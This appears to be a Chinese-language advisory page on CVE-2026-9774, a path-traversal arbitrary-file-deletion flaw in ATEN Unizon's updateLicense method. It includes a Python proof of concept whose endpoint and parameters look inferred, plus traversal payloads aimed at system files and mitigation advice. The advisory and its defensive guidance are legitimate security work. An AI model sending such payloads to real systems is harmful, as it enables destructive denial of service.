IPBUF安全漏洞报告
English
CVE-2026-9774 CVSS 5.5 中危

CVE-2026-9774 ATEN Unizon updateLicense目录遍历任意文件删除漏洞

披露日期: 2026-06-24

漏洞信息

漏洞编号
CVE-2026-9774
漏洞类型
目录遍历(路径遍历)
CVSS评分
5.5 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
ATEN Unizon

相关标签

目录遍历路径遍历任意文件删除拒绝服务ATENUnizonZDI中危漏洞身份验证绕过网络攻击

漏洞概述

CVE-2026-9774是ATEN Unizon产品中updateLicense方法存在的一个目录遍历漏洞,允许经过身份验证的远程攻击者在受影响系统上删除任意文件。该漏洞由ZDI(Zero Day Initiative)披露,编号为ZDI-CAN-28502,CVSS 3.0评分为5.5分,属于中危级别。ATEN Unizon是ATEN公司推出的一款集中化管理软件,主要用于数据中心IT设备(如KVM切换器、PDU等)的集中监控与管理。该漏洞的根源在于updateLicense方法在处理用户提供的路径参数时缺乏充分的验证和过滤,攻击者可以通过构造包含目录遍历序列(如../)的恶意路径,将文件操作的目标指向任意位置,从而实现任意文件的删除操作。虽然利用该漏洞需要高权限认证(PR:H),但成功利用后可对系统造成拒绝服务(DoS)状态,删除关键系统文件或应用程序文件,严重影响系统的可用性。该漏洞已于2026年6月24日由Trend Micro的ZDI团队公开披露,建议相关用户及时关注ATEN官方发布的安全公告并进行修复。

技术细节

该漏洞的核心问题存在于ATEN Unizon的updateLicense方法中,具体技术细节如下:

1. **漏洞触发点**:updateLicense方法负责处理许可证更新请求,在更新过程中需要读取或操作许可证文件。

2. **根本原因**:该方法在接收用户提供的文件路径参数后,未对路径进行充分的合法性校验和规范化处理(如未过滤../目录遍历序列或未使用安全的路径拼接函数)。

3. **利用方式**:攻击者(需具备高权限认证)通过向updateLicense接口发送精心构造的HTTP请求,在路径参数中注入目录遍历序列(如../../../../etc/passwd或../../../关键系统文件路径),使文件操作的目标跳出预期的许可证书目录,指向系统中的任意文件。

4. **攻击后果**:当updateLicense方法执行文件操作(如删除旧许可证、写入新许可证)时,由于路径已被篡改,会对攻击者指定的任意文件执行删除操作。攻击者可利用此漏洞删除操作系统关键文件、应用程序文件或配置文件,导致系统无法正常运行,造成拒绝服务(DoS)。

5. **CVSS向量分析**:AV:N(网络可利用)、AC:L(低攻击复杂度)、PR:H(需要高权限)、UI:N(无需用户交互)、S:U(影响范围未改变)、C:L(机密性影响低)、I:L(完整性影响低)、A:H(可用性影响高)。

6. **参考标识**:ZDI-CAN-28502,ZDI-26-378。

攻击链分析

STEP 1
步骤1:获取认证凭据
攻击者首先需要获取ATEN Unizon管理控制台的高权限认证凭据。这可能通过社会工程学、凭据填充攻击或利用其他漏洞获得。
STEP 2
步骤2:探测updateLicense接口
攻击者登录系统后,定位到负责许可证更新的updateLicense API接口,分析其请求参数和路径处理逻辑。
STEP 3
步骤3:构造目录遍历Payload
攻击者在licenseFilePath等路径参数中注入目录遍历序列(如../../../),构造指向系统关键文件的恶意路径。
STEP 4
步骤4:发送恶意请求
攻击者通过认证会话向updateLicense接口发送包含恶意路径的HTTP请求,触发文件删除操作。
STEP 5
步骤5:任意文件删除/拒绝服务
由于缺乏路径验证,系统执行了针对任意路径的文件删除操作,攻击者可删除关键系统文件或应用文件,导致系统不可用。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2026-9774 - ATEN Unizon updateLicense Directory Traversal PoC # Vulnerability: Arbitrary File Deletion via Path Traversal in updateLicense method # Requires: High-privilege authentication (PR:H) # Original: ZDI-CAN-28502 / ZDI-26-378 import requests TARGET_URL = "https://target-aten-unizon-host" AUTH_TOKEN = "<authenticated_session_token>" # Requires high-privilege credentials # Malicious path using directory traversal to target arbitrary file # The updateLicense method fails to sanitize path parameters MALICIOUS_PATH = "../../../../../../windows/system32/drivers/etc/hosts" def exploit_delete_file(target_file_path): """ Exploit directory traversal in updateLicense method to delete arbitrary files on the target system. """ endpoint = f"{TARGET_URL}/api/license/update" headers = { "Authorization": f"Bearer {AUTH_TOKEN}", "Content-Type": "application/json" } # Inject traversal sequence into the license file path parameter payload = { "licenseFilePath": target_file_path, "licenseData": "AAAA", "action": "update" } response = requests.post(endpoint, json=payload, headers=headers) if response.status_code == 200: print(f"[+] Request successful - file operation attempted on: {target_file_path}") else: print(f"[-] Request failed with status: {response.status_code}") if __name__ == "__main__": # Target a critical system file to cause DoS exploit_delete_file(MALICIOUS_PATH)

影响范围

ATEN Unizon(具体受影响版本请参考ATEN官方安全公告)

防御指南

临时缓解措施
在官方补丁发布前,建议采取以下临时缓解措施:1)限制ATEN Unizon管理控制台的访问来源,仅允许可信IP地址访问;2)实施强密码策略和多因素认证,降低凭据被盗用的风险;3)在网络层部署WAF,配置路径遍历攻击检测规则;4)定期备份关键文件和系统配置,以便在遭受攻击后能够快速恢复;5)监控updateLicense接口的异常请求,及时发现可疑的文件删除操作;6)遵循最小权限原则,限制管理员账户的数量和权限范围。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表